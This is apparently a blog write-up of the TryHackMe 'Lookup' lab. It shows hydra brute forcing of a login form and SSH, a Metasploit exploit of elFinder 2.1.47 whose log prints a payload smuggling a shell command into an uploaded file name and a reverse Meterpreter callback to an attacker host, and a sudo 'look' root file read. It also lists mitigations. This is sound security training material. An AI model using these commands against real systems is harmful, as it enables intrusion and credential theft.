close
Skip to main content

Command Palette

Search for a command to run...

TryHackMe : Lookup writeup

Updated
7 min readView as Markdown
TryHackMe : Lookup writeup
Y
I write detailed writeups on HackTheBox, PicoCTF and other CTF challenges. Passionate about web exploitation, Active Directory attacks and ethical hacking

Summary

Lookup is an easy Linux box built around a login portal that redirects authenticated users to a vhost-hosted elFinder file manager. Username enumeration on the login form combined with password brute forcing yields valid credentials, which unlock a vulnerable elFinder 2.1.47 instance. A Metasploit module exploiting an exiftran command injection in the PHP connector gives a www-data shell. A custom SSH password wordlist built around the compromised user's naming pattern cracks the think account, and a SUID look binary misconfiguration in sudoers grants root file read access.

1. Reconnaissance

nmap -A -Pn <MACHINE_IP> -o nmap
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://lookup.thm

Port 80 redirects to a vhost, so it gets added to /etc/hosts.

echo '<MACHINE_IP> lookup.thm' >> /etc/hosts

2. Web Enumeration

Root of lookup.thm serves a simple login form posting to login.php.

curl http://lookup.thm/
<form action="login.php" method="post">
  <input type="text" id="username" name="username" required>
  <input type="password" id="password" name="password" required>
</form>

2.1 Username enumeration

The application returns different error strings depending on whether the username exists:

curl http://lookup.thm/login.php -d 'username=admin&password=admin'
Wrong password. Please try again.

curl http://lookup.thm/login.php -d 'username=test&password=admin'
Wrong username or password. Please try again.

This is a textbook user-enumeration oracle - "Wrong password" confirms the username exists, "Wrong username or password" means it doesn't.

2.2 Username brute force

hydra -L /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -p wrongpass lookup.thm http-post-form "/login.php:username=^USER^&password=^PASS^:S=Wrong password" -t 64
[80][http-post-form] host: lookup.thm   login: admin   password: wrongpass
[80][http-post-form] host: lookup.thm   login: jose    password: wrongpass

Valid usernames: admin, jose.

2.3 Password brute force

hydra -l jose -P /usr/share/wordlists/rockyou.txt lookup.thm http-post-form "/login.php:username=^USER^&password=^PASS^:Wrong password"
[80][http-post-form] host: lookup.thm   login: jose   password: password123

2.4 Authenticated redirect

curl -v -L http://lookup.thm/login.php -d 'username=jose&password=password123'
< Set-Cookie: login_status=success; ...
< Location: http://files.lookup.thm

Add the new vhost and confirm with ffuf that it's the only relevant subdomain:

echo '<MACHINE_IP> lookup.thm files.lookup.thm' >> /etc/hosts

ffuf -u http://lookup.thm/ -H "HOST: FUZZ.lookup.thm" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -ac
www   [Status: 200, Size: 719, Words: 114, Lines: 27, Duration: 2432ms]

3. elFinder Discovery

Using the login_status cookie to access the new vhost reveals an elFinder web file manager:

curl -c cookies.txt http://lookup.thm/login.php -d 'username=jose&password=password123'
curl -L -b cookies.txt http://files.lookup.thm/
<title>elFinder</title>
<script>
  define('elFinderConfig', {
    defaultOpts : {
      url : 'php/connector.minimal.php'

Browsing directly and opening the "About" dialog (question mark icon) in the UI confirms the exact version:

  • elFinder 2.1.47, protocol version 2.1047

The root listing browsable through the file manager also exposes a set of interesting text files (credentials.txt, adm.txt, admin.txt, administrator.txt, ansible.txt, azureuser.txt, ec2-user.txt, ftp.txt, puppet.txt, root.txt), consistent with a username/credential-harvesting wordlist staged on the box.

4. Exploitation - elFinder Exiftran Command Injection

elFinder 2.1.47's PHP connector is vulnerable to command injection via the exiftran image-rotation command, exploited through Metasploit.

msfconsole
search elfinder 2.1.47
use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection
set RHOSTS files.lookup.thm
set RPORT 80
set LHOST tun0
run
[*] Uploading payload 'IYlgUsiQat.jpg;echo <hex-encoded-payload> |xxd -r -p |sh& #.jpg' (1948 bytes)
[*] Triggering vulnerability via image rotation ...
[*] Executing payload (/elFinder/php/.LjjKJ9S.php) ...
[*] Sending stage (45739 bytes) to <MACHINE_IP>
[+] Deleted .LjjKJ9S.php
[*] Meterpreter session 1 opened (<ATTACKER_IP>:4444 -> <MACHINE_IP>:34990)
meterpreter > getuid
Server username: www-data
meterpreter > shell

Note: the first attempt with LHOST bound to the wrong interface silently failed ("Exploit completed, but no session was created"); re-setting LHOST to the tun0 VPN adapter fixed callback delivery.

5. Post-Exploitation Enumeration

www-data@ip-<MACHINE_IP>:/var/www$ ls /home
ssm-user  think  ubuntu

ls -la /home/think/
-rw-r----- 1 root  think  525 Jul 30  2023 .passwords
-rw-r----- 1 root  think   33 Jul 30  2023 user.txt

.passwords is owned root:think and not world-readable, so www-data can't read it directly.

A SUID binary is found during a broader search:

find / -perm -4000 2>/dev/null
/usr/sbin/pwm
/usr/sbin/pwm -h
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: www-data
[-] File /home/www-data/.passwords not found

pwm is a custom password-mutation helper that reads the invoking user's ~/.passwords file and generates candidate password permutations from it. As www-data there is no .passwords file to seed it, but the behavior confirms think's .passwords file is the source of a personalized password scheme (name + separator + relative/nickname).

6. SSH Access as think

A wordlist was hand-crafted around the naming convention observed (jose combined with names/dates using . and & separators):

cat > pass.txt << 'EOF'
jose&takie
jose&samantha
jose&pam
josemario.AKA(think)
jose.medina.
...
EOF

hydra -l think -P pass.txt ssh://lookup.thm
[22][ssh] host: lookup.thm   login: think   password: josemario.AKA(think)
www-data@ip-<MACHINE_IP>:/var/www$ su think
Password:
think@ip-<MACHINE_IP>:/var/www$ id
uid=1000(think) gid=1000(think) groups=1000(think)

User flag

think@ip-<MACHINE_IP>:~$ cat user.txt
<REDACTED>

7. Privilege Escalation - sudo look

think@ip-<MACHINE_IP>:~$ sudo -l
User think may run the following commands on ip-<MACHINE_IP>:
    (ALL) /usr/bin/look

look normally searches /usr/share/dict/words for lines starting with a given string, taking the dictionary file as an optional second argument. Direct attempts fail because the default dictionary doesn't exist:

sudo /usr/bin/look /root/root.txt
look: /usr/share/dict/words: No such file or directory

Passing an empty search string with the target file as the "dictionary" argument makes look dump the entire file instead of searching it (documented GTFOBins technique for look):

think@ip-<MACHINE_IP>:~$ sudo look '' /root/root.txt

Root flag

<REDACTED>

This grants arbitrary root-owned file read, which is sufficient here to retrieve the flag (not a full root shell).

8. Key Vulnerabilities

# Vulnerability Location Impact
1 Username enumeration via differing login error messages login.php Reveals valid usernames, enables targeted credential brute force
2 Weak password policy jose account password123 cracked from rockyou.txt
3 elFinder 2.1.47 exiftran command injection files.lookup.thm PHP connector Unauthenticated RCE as www-data
4 Predictable personal password scheme think's .passwords / SSH SSH access via crafted wordlist
5 Sudoers misconfiguration - look with no argument restriction /etc/sudoers Arbitrary root-owned file read via GTFOBins technique

9. Attack Chain

Login page (lookup.thm)
    |
    |-- error-message oracle -> username enumeration (hydra) -> "jose"
    |-- rockyou.txt brute force -> jose:password123
    v
Authenticated redirect -> files.lookup.thm (elFinder 2.1.47)
    |
    |-- Metasploit: elfinder_php_connector_exiftran_cmd_injection
    v
Meterpreter / shell as www-data
    |
    |-- find /home/think/.passwords (unreadable) + pwm SUID hints at naming scheme
    |-- custom wordlist -> hydra ssh -> think:josemario.AKA(think)
    v
Shell as think -> user.txt
    |
    |-- sudo -l -> (ALL) /usr/bin/look
    |-- sudo look '' /root/root.txt  (GTFOBins file-read primitive)
    v
root.txt read

10. Mitigations

  • Return an identical, generic error message ("Invalid username or password") regardless of whether the username exists, to eliminate the enumeration oracle.
  • Enforce password complexity/length and rate-limit or lock out repeated failed login attempts (both on the web login form and SSH).
  • Upgrade elFinder past 2.1.47 / patch the exiftran connector, or remove exiftran-dependent image editing features entirely; keep third-party file-manager components under active patch management.
  • Do not derive user passwords from predictable personal-detail patterns; a password manager or company-issued high-entropy credential removes this class of guessable password entirely.
  • Restrict sudoers entries to fully-qualified commands with fixed arguments (e.g. via a wrapper script), or avoid granting sudo on generic text-processing utilities like look, more, less, awk, etc., all of which have known GTFOBins abuse primitives.
N
NANGYSEC14d ago

Interesting